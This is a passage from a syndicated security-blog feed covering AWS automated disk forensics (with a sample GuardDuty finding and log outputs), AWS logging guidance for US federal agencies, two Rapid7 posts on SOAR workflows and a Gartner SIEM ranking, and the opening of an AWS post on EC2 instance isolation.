      “SourceUrl”: “https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=b0baa737c3bf7309db2a396651fdb500”,
      “ProductFields”: {
        “aws/guardduty/service/action/networkConnectionAction/remotePortDetails/portName”: “HTTP”,
        “aws/guardduty/service/archived”: “false”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asnOrg”: “GeneratedFindingASNOrg”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lat”: “0”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/ipAddressV4”: “198.51.100.0”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lon”: “0”,
        “aws/guardduty/service/action/networkConnectionAction/blocked”: “false”,
        “aws/guardduty/service/action/networkConnectionAction/remotePortDetails/port”: “80”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/country/countryName”: “GeneratedFindingCountryName”,
        “aws/guardduty/service/serviceName”: “guardduty”,
        “aws/guardduty/service/action/networkConnectionAction/localIpDetails/ipAddressV4”: “10.0.0.23”,
        “aws/guardduty/service/detectorId”: “f2b82a2b2d8d8541b8c6d2c7d9148e14”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/org”: “GeneratedFindingORG”,
        “aws/guardduty/service/action/networkConnectionAction/connectionDirection”: “OUTBOUND”,
        “aws/guardduty/service/eventFirstSeen”: “2020-10-22T03:52:13.438Z”,
        “aws/guardduty/service/eventLastSeen”: “2020-10-22T03:52:13.438Z”,
        “aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatListName”: “GeneratedFindingThreatListName”,
        “aws/guardduty/service/action/networkConnectionAction/localPortDetails/portName”: “Unknown”,
        “aws/guardduty/service/action/actionType”: “NETWORK_CONNECTION”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/city/cityName”: “GeneratedFindingCityName”,
        “aws/guardduty/service/resourceRole”: “TARGET”,
        “aws/guardduty/service/action/networkConnectionAction/localPortDetails/port”: “39677”,
        “aws/guardduty/service/action/networkConnectionAction/protocol”: “TCP”,
        “aws/guardduty/service/count”: “1”,
        “aws/guardduty/service/additionalInfo/sample”: “true”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asn”: “-1”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/isp”: “GeneratedFindingISP”,
        “aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatNames.0_”: “GeneratedFindingThreatName”,
        “aws/securityhub/FindingId”: “arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500”,
        “aws/securityhub/ProductName”: “GuardDuty”,
        “aws/securityhub/CompanyName”: “Amazon”
      },
      “Resources”: [
        {
          “Type”: “AwsEc2Instance”,
          “Id”: “arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999”,
          “Partition”: “aws”,
          “Region”: “us-east-1”,
          “Tags”: {
            “GeneratedFindingInstaceTag7”: “GeneratedFindingInstaceTagValue7”,
            “GeneratedFindingInstaceTag8”: “GeneratedFindingInstaceTagValue8”,
            “GeneratedFindingInstaceTag9”: “GeneratedFindingInstaceTagValue9”,
            “GeneratedFindingInstaceTag1”: “GeneratedFindingInstaceValue1”,
            “GeneratedFindingInstaceTag2”: “GeneratedFindingInstaceTagValue2”,
            “GeneratedFindingInstaceTag3”: “GeneratedFindingInstaceTagValue3”,
            “GeneratedFindingInstaceTag4”: “GeneratedFindingInstaceTagValue4”,
            “GeneratedFindingInstaceTag5”: “GeneratedFindingInstaceTagValue5”,
            “GeneratedFindingInstaceTag6”: “GeneratedFindingInstaceTagValue6”
          },
          “Details”: {
            “AwsEc2Instance”: {
              “Type”: “m3.xlarge”,
              “ImageId”: “ami-99999999”,
              “IpV4Addresses”: [
                “10.0.0.1”,
                “198.51.100.0”
              ],
              “IamInstanceProfileArn”: “arn:aws:iam::0123456789012:example/instance/profile”,
              “VpcId”: “GeneratedFindingVPCId”,
              “SubnetId”: “GeneratedFindingSubnetId”,
              “LaunchedAt”: “2016-08-02T02:05:06Z”
            }
          }
        }
      ],
      “WorkflowState”: “NEW”,
      “Workflow”: {
        “Status”: “NEW”
      },
      “RecordState”: “ACTIVE”
    }
    

  2. Navigate to the DiskForensicsInvoke Lambda function and add the GuardDuty event as a test event.
  3. Choose Test. You should see a success for the invocation.
  4. Navigate to the Step Functions workflow to monitor its progress. When the instances have terminated, all of the artifacts should be in the S3 bucket with additional logs in CloudWatch Logs.

Expected outputs

The forensic disk collection pipeline maintains logs of the actions throughout the process, and uploads the final artifacts to the S3 artifact bucket and CloudWatch Logs. This enables security teams to send forensic collection logs to log aggregation tools or service management tools for additional integrations. The expected outputs of the solution are detailed in the following sections, organized by destination.

S3 artifact outputs

The S3 artifact bucket is the final destination for all logs and the raw disk images. For each security incident that triggers the Step Functions workflow, a new folder will be created with the name of the IncidentID. Included in this folder will be the JSON file that triggered the capture operation, the image (dd) files for the volumes, the capture log, and the resources associated with the capture operation, as shown in Figure 5.

Figure 5: Forensic artifacts in the S3 bucket

Figure 5: Forensic artifacts in the S3 bucket

Forensic Disk Audit log group

The Forensic Disk Audit CloudWatch log group contains a log of where the Step Functions workflow was after creating the initial snapshots in the CreateSnapshot Lambda function. This includes the high-level finding information, as well as the metadata for each snapshot. Also included in this log group is the completed data around each completed disk collection operation, including all associated resources and the location of the forensic evidence in the S3 bucket. The following event is an example log demonstrating a completed capture. Notice all of the metadata provided under captured snapshots. Be sure to update the example to use the correct AWS Region. Replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.

{
  "AwsAccountId": "0123456789012",
  "Types": [
    "Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient"
  ],
  "FirstObservedAt": "2020-10-22T03:52:13.438Z",
  "LastObservedAt": "2020-10-22T03:52:13.438Z",
  "CreatedAt": "2020-10-22T03:52:13.438Z",
  "UpdatedAt": "2020-10-22T03:52:13.438Z",
  "Severity": {
    "Product": 8,
    "Label": "HIGH",
    "Normalized": 60
  },
  "Title": "EC2 instance i-99999999 is communicating with Tor Entry node.",
  "Description": "EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.",
  "FindingId": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "Resource": {
    "Type": "AwsEc2Instance",
    "Arn": "arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999",
    "Id": "i-99999999",
    "Partition": "aws",
    "Region": "us-east-1",
    "Details": {
      "AwsEc2Instance": {
        "Type": "m3.xlarge",
        "ImageId": "ami-99999999",
        "IpV4Addresses": [
          "10.0.0.1",
          "198.51.100.0"
        ],
        "IamInstanceProfileArn": "arn:aws:iam::0123456789012:example/instance/profile",
        "VpcId": "GeneratedFindingVPCId",
        "SubnetId": "GeneratedFindingSubnetId",
        "LaunchedAt": "2016-08-02T02:05:06Z"
      }
    }
  },
  "EvidenceBucket": "forensic-artifact-bucket",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "CapturedSnapshots": [
    {
      "SourceSnapshotID": "snap-99999999",
      "SourceVolumeID": "vol-99999999",
      "SourceDeviceName": "/dev/xvda",
      "VolumeSize": 100,
      "InstanceID": "i-99999999",
      "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
      "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
      "AccountID": "0123456789012",
      "Region": "us-east-1",
      "EvidenceBucket": "forensic-artifact-bucket"
    }
  ]
}
{
  "SourceSnapshotID": "snap-99999999",
  "SourceVolumeID": "vol-99999999",
  "SourceDeviceName": "/dev/sdd",
  "VolumeSize": 100,
  "InstanceID": "i-99999999",
  "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "AccountID": "0123456789012",
  "Region": "us-east-1",
  "EvidenceBucket": "forensic-artifact-bucket",
  "CopiedSnapshotID": "snap-99999998",
  "EncryptionKey": "arn:aws:kms:us-east-1:0123456789012:key/e793cbd3-ce6a-4b17-a48f-7e78984346f2",
  "FinalCopiedSnapshotID": "snap-99999997",
  "ForensicVolumeID": "vol-99999998",
  "VolumeAZ": "us-east-1a",
  "ForensicInstances": [
    "i-99999998"
  ],
  "DiskImageLocation": "s3://forensic-artifact-bucket/b0baa737c3bf7309db2a396651fdb500/disk_evidence/vol-99999999.image.dd"
}

Forensic Disk Capture log group

The Forensic Disk Capture CloudWatch log group contains the logs from the EC2Collector VM. These logs detail the operations taken by the instance, which include when the dc3dd command was executed, what the transfer speed was to the S3 bucket, what the hash of the volume was, and how long the total operation took to complete. The log example in Figure 6 shows the output of the disk capture on the collector instance.

Figure 6: Forensic Disk Capture logs

Figure 6: Forensic Disk Capture logs

Cost and capture times

This solution may save you money over a traditional system that requires bastion hosts (jump boxes) and forensic instances to be readily available. With AWS, you pay only for the individual services you need, for as long as you use them. The cost of this solution is minimal, because charges are only incurred based on the logs or artifacts that you store in CloudWatch or Amazon S3, and the invocation of the Step Functions workflow. Additionally, resources such as the collectorVM are only created and used when needed.

This solution can also save you time. If an analyst was manually working through this workflow, it could take significantly more time than the automated solution. The following are some examples of collection times. You can see that even when the manual workflow time increases, the automated workflow time stays the same, because of how the solution scales.

Scenario 1: EC2 instance with one 8GB volume

  • Automated workflow: 11 minutes
  • Manual workflow: 15 minutes

Scenario 2: EC2 instance with four 8GB volumes

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 10 minutes

Scenario 3: Four EC2 instances with one 8GB volume each

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 20 minutes

Clean up and delete artifacts

To clean up the artifacts from the solution in this post, first delete all information in your artifact S3 bucket. Then delete the diskForensics stack, followed by the diskForensicImageBuilder stack, and finally the diskMember stack. You must also manually delete any EBS volumes or EBS snapshots created by the pipeline, these are not deleted automatically. You must also manually delete the AMI and images that are created and published by Image Builder.

Considerations

This solution covers EBS volume storage as the target for forensic disk capture. If your instances use Amazon EC2 Instance Stores in your environment, then you cannot snapshot and copy those volumes, because that data is not included in an EC2 snapshot operation. Instead, you should consider running the commands that are included in collector.sh script with AWS Systems Manager. The collector.sh script is included in the Image Builder recipe and uses dc3dd to stream a copy of the volume to Amazon S3.

Conclusion

Having this solution in place across your AWS accounts will enable fast response times to security events, as it helps ensure that forensic artifacts are collected and stored as quickly as possible. Download the .zip file for the solutions in CloudFormation, so that you can deploy this solution and get started on your own forensic automation workflows. For the talks describing this solution, see the video of SEC306 from Re:Invent 2020 and the AWS Online Tech Talk AWS Digital Forensics Automation at Goldman Sachs.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon GuardDuty forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Matt Duda

Matt is a Senior Cloud Security Architect with AWS Professional Services. He has an extensive background in Cyber Security in the Financial Services Sector. He is obsessed with helping customers improve their ability to prevent, prepare, and respond to potential security events in AWS and utilizing automation wherever possible.

Contributor

Special thanks to Logan Bair who made significant contributions to this post.

How US federal agencies can use AWS to improve logging and log retention

Post Syndicated from Derek Doerr original https://aws.amazon.com/blogs/security/how-us-federal-agencies-can-use-aws-to-improve-logging-and-log-retention/

This post is part of a series about how Amazon Web Services (AWS) can help your US federal agency meet the requirements of the President’s Executive Order on Improving the Nation’s Cybersecurity. You will learn how you can use AWS information security practices to help meet the requirement to improve logging and log retention practices in your AWS environment.

Improving the security and operational readiness of applications relies on improving the observability of the applications and the infrastructure on which they operate. For our customers, this translates to questions of how to gather the right telemetry data, how to securely store it over its lifecycle, and how to analyze the data in order to make it actionable. These questions take on more importance as our federal customers seek to improve their collection and management of log data in all their IT environments, including their AWS environments, as mandated by the executive order.

Given the interest in the technologies used to support logging and log retention, we’d like to share our perspective. This starts with an overview of logging concepts in AWS, including log storage and management, and then proceeds to how to gain actionable insights from that logging data. This post will address how to improve logging and log retention practices consistent with the Security and Operational Excellence pillars of the AWS Well-Architected Framework.

Log actions and activity within your AWS account

AWS provides you with extensive logging capabilities to provide visibility into actions and activity within your AWS account. A security best practice is to establish a wide range of detection mechanisms across all of your AWS accounts. Starting with services such as AWS CloudTrail, AWS Config, Amazon CloudWatch, Amazon GuardDuty, and AWS Security Hub provides a foundation upon which you can base detective controls, remediation actions, and forensics data to support incident response. Here is more detail on how these services can help you gain more security insights into your AWS workloads:

  • AWS CloudTrail provides event history for all of your AWS account activity, including API-level actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services. You can use CloudTrail to identify who or what took which action, what resources were acted upon, when the event occurred, and other details. If your agency uses AWS Organizations, you can automate this process for all of the accounts in the organization.
  • CloudTrail logs can be delivered from all of your accounts into a centralized account. This places all logs in a tightly controlled, central location, making it easier to both protect them as well as to store and analyze them. As with AWS CloudTrail, you can automate this process for all of the accounts in the organization using AWS Organizations.  CloudTrail can also be configured to emit metrical data into the CloudWatch monitoring service, giving near real-time insights into the usage of various services.
  • CloudTrail log file integrity validation produces and cyptographically signs a digest file that contains references and hashes for every CloudTrail file that was delivered in that hour. This makes it computationally infeasible to modify, delete or forge CloudTrail log files without detection. Validated log files are invaluable in security and forensic investigations. For example, a validated log file enables you to assert positively that the log file itself has not changed, or that particular user credentials performed specific API activity.
  • AWS Config monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. For example, you can use AWS Config to verify that resources are encrypted, multi-factor authentication (MFA) is enabled, and logging is turned on, and you can use AWS Config rules to identify noncompliant resources. Additionally, you can review changes in configurations and relationships between AWS resources and dive into detailed resource configuration histories, helping you to determine when compliance status changed and the reason for the change.
  • Amazon GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior to protect your AWS accounts and workloads. Amazon GuardDuty analyzes and processes the following data sources: VPC Flow Logs, AWS CloudTrail management event logs, CloudTrail Amazon Simple Storage Service (Amazon S3) data event logs, and DNS logs. It uses threat intelligence feeds, such as lists of malicious IP addresses and domains, and machine learning to identify potential threats within your AWS environment.
  • AWS Security Hub provides a single place that aggregates, organizes, and prioritizes your security alerts, or findings, from multiple AWS services and optional third-party products to give you a comprehensive view of security alerts and compliance status.

You should be aware that most AWS services do not charge you for enabling logging (for example, AWS WAF) but the storage of logs will incur ongoing costs. Always consult the AWS service’s pricing page to understand cost impacts. Related services such as Amazon Kinesis Data Firehose (used to stream data to storage services), and Amazon Simple Storage Service (Amazon S3), used to store log data, will incur charges.

Turn on service-specific logging as desired

After you have the foundational logging services enabled and configured, next turn your attention to service-specific logging. Many AWS services produce service-specific logs that include additional information. These services can be configured to record and send out information that is necessary to understand their internal state, including application, workload, user activity, dependency, and transaction telemetry. Here’s a sampling of key services with service-specific logging features:

  • Amazon CloudWatch provides you with data and actionable insights to monitor your applications, respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health. CloudWatch collects monitoring and operational data in the form of logs, metrics, and events, providing you with a unified view of AWS resources, applications, and services that run on AWS and on-premises servers. You can gain additional operational insights from your AWS compute instances (Amazon Elastic Compute Cloud, or EC2) as well as on-premises servers using the CloudWatch agent. Additionally, you can use CloudWatch to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly.
  • Amazon CloudWatch Logs is a component of Amazon CloudWatch which you can use to monitor, store, and access your log files from Amazon Elastic Compute Cloud (Amazon EC2) instances, AWS CloudTrail, Route 53, and other sources. CloudWatch Logs enables you to centralize the logs from all of your systems, applications, and AWS services that you use, in a single, highly scalable service. You can then easily view them, search them for specific error codes or patterns, filter them based on specific fields, or archive them securely for future analysis. CloudWatch Logs enables you to see all of your logs, regardless of their source, as a single and consistent flow of events ordered by time, and you can query them and sort them based on other dimensions, group them by specific fields, create custom computations with a powerful query language, and visualize log data in dashboards.
  • Traffic Mirroring allows you to achieve full packet capture (as well as filtered subsets) of network traffic from an elastic network interface of EC2 instances inside your VPC. You can then send the captured traffic to out-of-band security and monitoring appliances for content inspection, threat monitoring, and troubleshooting.
  • The Elastic Load Balancing service provides access logs that capture detailed information about requests that are sent to your load balancer. Each log contains information such as the time the request was received, the client’s IP address, latencies, request paths, and server responses. The specific information logged varies by load balancer type:
  • Amazon S3 access logs record the S3 bucket and account that are being accessed, the API action, and requester information.
  • AWS Web Application Firewall (WAF) logs record web requests that are processed by AWS WAF, and indicate whether the requests matched AWS WAF rules and what actions, if any, were taken. These logs are delivered to Amazon S3 by using Amazon Kinesis Data Firehose.
  • Amazon Relational Database Service (Amazon RDS) log files can be downloaded or published to Amazon CloudWatch Logs. Log settings are specific to each database engine. Agencies use these settings to apply their desired logging configurations and chose which events are logged.  Amazon Aurora and Amazon RDS for Oracle also support a real-time logging feature called “database activity streams” which provides even more detail, and cannot be accessed or modified by database administrators.
  • Amazon Route 53 provides options for logging for both public DNS query requests as well as Route53 Resolver DNS queries:
    • Route 53 Resolver DNS query logs record DNS queries and responses that originate from your VPC, that use an inbound Resolver endpoint, that use an outbound Resolver endpoint, or that use a Route 53 Resolver DNS Firewall.
    • Route 53 DNS public query logs record queries to Route 53 for domains you have hosted with AWS, including the domain or subdomain that was requested; the date and time of the request; the DNS record type; the Route 53 edge location that responded to the DNS query; and the DNS response code.
  • Amazon Elastic Compute Cloud (Amazon EC2) instances can use the unified CloudWatch agent to collect logs and metrics from Linux, macOS, and Windows EC2 instances and publish them to the Amazon CloudWatch service.
  • Elastic Beanstalk logs can be streamed to CloudWatch Logs. You can also use the AWS Management Console to request the last 100 log entries from the web and application servers, or request a bundle of all log files that is uploaded to Amazon S3 as a ZIP file.
  • Amazon CloudFront logs record user requests for content that is cached by CloudFront.

Store and analyze log data

Now that you’ve enabled foundational and service-specific logging in your AWS accounts, that data needs to be persisted and managed throughout its lifecycle. AWS offers a variety of solutions and services to consolidate your log data and store it, secure access to it, and perform analytics.

Store log data

The primary service for storing all of this logging data is Amazon S3. Amazon S3 is ideal for this role, because it’s a highly scalable, highly resilient object storage service. AWS provides a rich set of multi-layered capabilities to secure log data that is stored in Amazon S3, including encrypting objects (log records), preventing deletion (the S3 Object Lock feature), and using lifecycle policies to transition data to lower-cost storage over time (for example, to S3 Glacier). Access to data in Amazon S3 can also be restricted through AWS Identity and Access Management (IAM) policies, AWS Organizations service control policies (SCPs), S3 bucket policies, Amazon S3 Access Points, and AWS PrivateLink interfaces. While S3 is particularly easy to use with other AWS services given its various integrations, many customers also centralize their storage and analysis of their on-premises log data, or log data from other cloud environments, on AWS using S3 and the analytic features described below.

If your AWS accounts are organized in a multi-account architecture, you can make use of the AWS Centralized Logging solution. This solution enables organizations to collect, analyze, and display CloudWatch Logs data in a single dashboard. AWS services generate log data, such as audit logs for access, configuration changes, and billing events. In addition, web servers, applications, and operating systems all generate log files in various formats. This solution uses the Amazon Elasticsearch Service (Amazon ES) and Kibana to deploy a centralized logging solution that provides a unified view of all the log events. In combination with other AWS-managed services, this solution provides you with a turnkey environment to begin logging and analyzing your AWS environment and applications.

You can also make use of services such as Amazon Kinesis Data Firehose, which you can use to transport log information to S3, Amazon ES, or any third-party service that is provided with an HTTP endpoint, such as Datadog, New Relic, or Splunk.

Finally, you can use Amazon EventBridge to route and integrate event data between AWS services and to third-party solutions such as software as a service (SaaS) providers or help desk ticketing systems. EventBridge is a serverless event bus service that allows you to connect your applications with data from a variety of sources. EventBridge delivers a stream of real-time data from your own applications, SaaS applications, and AWS services, and then routes that data to targets such as AWS Lambda.

Analyze log data and respond to incidents

As the final step in managing your log data, you can use AWS services such as Amazon Detective, Amazon ES, CloudWatch Logs Insights, and Amazon Athena to analyze your log data and gain operational insights.

  • Amazon Detective makes it easy to analyze, investigate, and quickly identify the root cause of security findings or suspicious activities. Detective automatically collects log data from your AWS resources. It then uses machine learning, statistical analysis, and graph theory to help you visualize and conduct faster and more efficient security investigations.
  • Incident Manager is a component of AWS Systems Manger which enables you to automatically take action when a critical issue is detected by an Amazon CloudWatch alarm or Amazon Eventbridge event. Incident Manager executes pre-configured response plans to engage responders via SMS and phone calls, enable chat commands and notifications using AWS Chatbot, and execute AWS Systems Manager Automation runbooks. The Incident Manager console integrates with AWS Systems Manager OpsCenter to help you track incidents and post-incident action items from a central place that also synchronizes with popular third-party incident management tools such as Jira Service Desk and ServiceNow.
  • Amazon Elasticsearch Service (Amazon ES) is a fully managed service that collects, indexes, and unifies logs and metrics across your environment to give you unprecedented visibility into your applications and infrastructure. With Amazon ES, you get the scalability, flexibility, and security you need for the most demanding log analytics workloads. You can configure a CloudWatch Logs log group to stream data it receives to your Amazon ES cluster in near real time through a CloudWatch Logs subscription.
  • CloudWatch Logs Insights enables you to interactively search and analyze your log data in CloudWatch Logs.
  • Amazon Athena is an interactive query service that you can use to analyze data in Amazon S3 by using standard SQL. Athena is serverless, so there is no infrastructure to manage, and you pay only for the queries that you run.

Conclusion

As called out in the executive order, information from network and systems logs is invaluable for both investigation and remediation services. AWS provides a broad set of services to collect an unprecedented amount of data at very low cost, optionally store it for long periods of time in tiered storage, and analyze that telemetry information from your cloud-based workloads. These insights will help you improve your organization’s security posture and operational readiness and, as a result, improve your organization’s ability to deliver on its mission.

Next steps

To learn more about how AWS can help you meet the requirements of the executive order, see the other post in this series:

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Derek Doerr

Derek is a Senior Solutions Architect with the Public Sector team at AWS. He has been working with AWS technology for over four years. Specializing in enterprise management and governance, he is passionate about helping AWS customers navigate their journeys to the cloud. In his free time, he enjoys time with family and friends, as well as scuba diving.

Energize Your Incident Response and Vulnerability Management With Crowdsourced Automation Workflows

Post Syndicated from Matthew Gardiner original https://blog.rapid7.com/2021/08/13/energize-your-incident-response-and-vulnerability-management-with-crowdsourced-automation-workflows/

Energize Your Incident Response and Vulnerability Management With Crowdsourced Automation Workflows

It’s no secret that most organizations need to dramatically improve their incident detection and response and vulnerability management (VM) programs. How many major security breaches could organizations avert if they could detect and address them at the start, when they’re still just minor incidents?

Industry statistics show that actual mean-time-to-responses (MTTRs) for security incidents are very slow — measured in days, weeks, or more, not the minutes or hours necessary to dramatically reduce the risk of a significant breach. In fact, IBM’s Cost of a Data Breach report found that it took organizations an average of 207 days to detect, let alone address, cybersecurity incidents in 2020. Not surprisingly, in countless security breach retrospectives, the excessive exposure windows leading up to breaches are often found to be key contributors to the ultimate blast radii of these events.

SOAR to a better response

But what causes this excessive exposure? This depends on the organization and certainly can’t be attributed to any one thing, but practically every organization has too many security alerts and software vulnerabilities and not enough people or time to investigate or appropriately respond to them all.

So, what is the answer? More people? This is typically unrealistic, as candidates are hard to find and expensive once you do find them. Reduce the number of alerts? Sure, but which ones? If they require an investigation to differentiate false positives from true breaches, which alerts should you turn off?

Clearly a key part of the answer is to automate as much of the incident response and VM processes as possible. If you can respond to some of the alerts and vulnerabilities completely (or mostly) automatically, all the better!

This is what security orchestration, automation, and response (SOAR) systems, such as Rapid7’s InsightConnect, were created to do. But a SOAR platform on its own doesn’t solve the automation problem — it is just a platform, after all. Organizations also need the applications that run in and bring the SOAR platform to life. Sometimes called playbooks or workflows, these applications deliver the data, decisioning, integration, and communication necessary to automate incident response, as well as the processes necessary to prioritize and patch vulnerabilities.

But like the problem of rebuilding a plane while simultaneously flying it, how does a slammed IR, SOC, or VM team find the time to create these automation applications while continuing to address the issues that are continuously rolling in?

Strength in numbers: The power of crowdsourcing workflows

Increasingly, we believe the answer lies in crowdsourcing workflows from their SOAR product community.

One of the key values of SOAR platforms is that they’re in effect specialized security communities with which users can share, customize, and run incident response, VM, and other types of workflows. With InsightConnect, users can pull integrations and incident response and VM workflows from the Extension Library and apply them quickly and easily to the specific needs of the organization. But what really makes this library great is the current and future applications — workflows — that you can find and check out.

Building on the hundreds of existing workflows contributed by Rapid7’s security experts, SOC analysts, and incident responders, we’ve recently taken the Extension Library to the next level by opening it up to submissions from customers and partners. Recently, we released our Contribute an Extension online process. This highly curated workflow submission system enables Rapid7 customers and partners to safely share their favorite workflows with the community.

In the spirit of open source software, Rapid7 acts as the curator of these submissions and vets them for privacy, security, and basic utility. We believe this expanded Extension Library experience will help organizations energize their incident response and VM programs and, by applying best practices and automation, reduce the likelihood of experiencing a major security incident.

The variety of potential automation applications are only limited by the community’s imagination — they aren’t even limited to pure incident response or VM automations. Any processes that security teams do repetitively and largely manually are excellent candidates for automation. Most security teams could certainly do with some help energizing — and some fresh insights from fellow practitioners might just be the spark they need.

HELP MAKE SECURITY KNOWLEDGE MORE ACCESSIBLE

Contribute an extension

Once Again, Rapid7 Named a Leader in 2021 Gartner Magic Quadrant for SIEM

Post Syndicated from Meaghan Donlon original https://blog.rapid7.com/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/

Rapid7 is elated for InsightIDR to be recognized as a Leader in the 2021 Gartner Magic Quadrant for Security Information and Event Management (SIEM).

Once Again, Rapid7 Named a Leader in 2021 Gartner Magic Quadrant for SIEM

This is the second consecutive time our SaaS SIEM—InsightIDR—has been named a Leader in this report. Access the full complimentary report from us here.

The Gartner Magic Quadrant reports provide a matrix for evaluating technology vendors in a given space. The framework looks at vendors on two axes: completeness of vision and ability to execute. In the case of SIEM, “Gartner defines the security and information event management (SIEM) market by the customer’s need to analyze event data in real time for early detection of targeted attacks and data breaches, and to collect, store, investigate and report on log data for incident response, forensics and regulatory compliance.”

As the detection and response market becomes more competitive, and the demands and challenges of this space grow more complex, we are honored to be recognized as one of the 6 2021 Magic Quadrant Leaders named in this report. We believe we are recognized for our usability and customer experience, as these are areas we’ve invested heavily in and recognize as critical to the success of today’s detection and response programs.

"This Product has surpassed expectations" – Security Analyst, Energies and Utlities ★★★★★

Thank you

First and foremost, we want to thank our Rapid7 InsightIDR customers and partners for being on this journey with us. Your ongoing feedback, partnership, and trust have fueled our innovation and uncompromising commitment to delivering sophisticated security outcomes that are accessible to all.

Access the full 2021 Gartner Magic Quadrant report here.

Accelerated change escalates challenges around modern detection and response

The last year has brought a swell of change for many organizations, including rapid cloud adoption, increased use of web applications, a significant shift to remote working, and new threats brought on by attackers exploiting circumstances around the pandemic. While these challenges weren’t new, their increased urgency highlighted cracks in an already fragile security ecosystem:

  • Increased cybersecurity demands widened the already growing skills gap
  • Uptime trumped security, often leaving SecOps professionals scrambling to keep up
  • The combination of these stresses drove many teams to a breaking point with alert fatigue

These market dynamics prompted a lot of Security Operations Center (SOC) teams to reevaluate current processes and systems, and push for change.

Rapid7 InsightIDR helps teams focus on what matters most to drive effective threat detection and response across modern IT environments

Our approach to detection and response has always been directed by what we hear from customers. This includes industry engagement and insights gathered through Rapid7’s research and open source communities, our firsthand experience with Rapid7 MDR (Managed Detection and Response) and services engagements, and of course, direct customer feedback. These collective learnings have enabled us to deeply understand the challenges facing SOC teams today, and pushed us to develop innovative solutions to anticipate and address their needs.

Rapid7 InsightIDR is not another log-aggregation-focused SIEM that sits on the shelf, or one that leaves the difficult and tedious work for security analysts to figure out on their own. Rather, our focus has always been to provide immediate, actionable insights and alerts that teams can feel confident responding to so they can extinguish threats quickly. With Rapid7 InsightIDR, security analysts are no longer fighting just to keep up. They’re empowered to scale and transform their security programs, however and wherever their environments evolve.

We are thrilled about this recognition, but like everything in cybersecurity, what’s most exciting is what happens next. We are committed to continually raising the bar and making it easier for SOC teams to accelerate their detection and response programs, while removing the distractions and noise that get in the way. Thank you again to our customers and partners for joining this journey with us. And stay tuned for more updates ahead soon!

"InsightIDR is my favorite SIEM because the preloaded detections for attacker tactics and techniques. The threat community within the platform is always providing new detections for IOCs. The team is always pleasant to work with, and I love all the feature updates we received this year!" – Information Security Engineer ★★★★★

Access the full 2021 Gartner Magic Quadrant report here.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Rapid7.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. Gartner Magic Quadrant for Security Information and Event Management (SIEM), Kelly Kavanagh, Toby Bussa, John Collins, 29 June 2021.

Automate Amazon EC2 instance isolation by using tags

Post Syndicated from Jose Obando original https://aws.amazon.com/blogs/security/automate-amazon-ec2-instance-isolation-by-using-tags/

Containment is a crucial part of an overall Incident Response Strategy, as this practice allows time for responders to perform forensics, eradication and recovery during an Incident. There are many different approaches to containment. In this post, we will be focusing on isolation—the ability to keep multiple targets separated so that each target only sees and affects itself—as a containment strategy.

I’ll show you how to automate isolation of an Amazon Elastic Compute Cloud (Amazon EC2) instance by using an AWS Lambda function that’s triggered by tag changes on the instance, as reported by Amazon CloudWatch Events.

CloudWatch Event Rules deliver a near real-time stream of system events that describe changes in Amazon Web Services (AWS) resources. See also Amazon EventBridge.

Preparing for an incident is important as outlined in the Security Pillar of the AWS Well-Architected Framework.

Out of the 7 Design Principles for Security in the Cloud, as per the Well-Architected Framework, this solution will cover the following:

